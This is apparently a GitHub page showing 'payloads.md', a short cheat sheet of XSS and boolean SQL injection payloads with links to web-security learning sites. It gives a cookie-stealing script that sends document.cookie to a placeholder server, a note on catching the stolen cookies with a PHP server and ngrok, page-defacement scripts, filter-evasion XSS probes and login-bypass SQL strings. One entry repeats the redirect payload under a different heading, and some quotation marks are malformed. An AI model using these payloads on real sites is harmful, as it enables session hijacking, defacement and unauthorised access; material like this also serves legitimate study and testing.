Skip to content

Latest commit

 

History

History
66 lines (58 loc) · 1.89 KB

payloads.md

File metadata and controls

66 lines (58 loc) · 1.89 KB

Capybara

The goal of this page is just to get attention.
Why do i have to seriously write online some payloads when there are already thousands of them online for any type of vulnerability? Anyway, i suggest these websites to study or review vulns!
https://www.invicti.com/learn/
https://www.hacksplaining.com/lessons
https://portswigger.net/web-security

Payloads

  1. Generic XSS payloads
  2. Various boolean based SQL injection payloads

Generic xss payloads.

Cookie stealer

<script>document.location=“http://yourserver.com/?c="+document.cookie;</script>

For example, to start a little server with php and ngrok i do: php -S localhost:<port> ngrok http <port>

Redirect

Achieve Open redirect

<script>window.location="https://example.com"</script>

Include External Script

<script>window.location="https://example.com"</script>

Overwrite body

Useful if a deface is needed

<script>document.getElementsByTagName('body')[0].innerHTML="jamal";</script>
<script>document.body.innerHTML = 'jamal';</script>

Other

Just search on google, you will find a lot of ways to escape filters

<script>alert("hello")</script>
document.write(location.search("><svg onload=alert(1)>"))
<svg/onload=alert("hi")>
<img src=x onerror="alert('hello');">
<iframe src=”javascript:alert(1)></iframe>
<var onmouseover="prompt(1)">move the cursor here</var>
<script>alert(window.origin)</script>
<script>alert(document.cookie)</script>
<script>confirm(document.domain)</script>

Various boolean based SQL injection payloads

Taken from this website, "Sql injection cheat sheet by invicti" (a read is strongly suggested)

admin' --
admin' #
admin'/*
' or 1=1--
' or 1=1#
' or 1=1/*
') or '1'='1--
') or ('1'='1--